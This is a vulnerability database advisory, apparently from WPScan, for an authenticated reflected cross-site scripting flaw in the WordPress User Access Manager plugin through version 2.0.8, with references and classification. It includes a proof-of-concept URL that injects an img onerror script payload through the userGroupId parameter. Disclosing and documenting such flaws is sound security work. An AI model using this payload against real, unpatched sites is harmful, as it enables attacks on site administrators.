User Access Manager <= 2.0.8 - Authenticated Reflected Cross-Site Scripting (XSS)

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Not patched in 2.0.0 despite what the advisory states.
Proof of Concept
http://www.example.com/wp-admin/admin.php?page=uam_user_group&uam_action=edit_user_group&userGroupId=1%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E%3C%22

Affects Plugin

fixed in version 2.0.9

References

URL http://www.defensecode.com/advisories/DC-2017-01-021_WordPress_User_Access_Manager_Plugin_Advisory.pdf
URL http://seclists.org/bugtraq/2017/May/31

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter ethicalhack3r
Submitter Website https://dewhurstsecurity.com/
Submitter Twitter ethicalhack3r
Views 165
Verified Yes
WPVDB ID 8814

Timeline

Publicly Published 2017-05-11 (7 months ago)
Added 2017-05-12 (7 months ago)
Last Updated 2017-06-02 (6 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.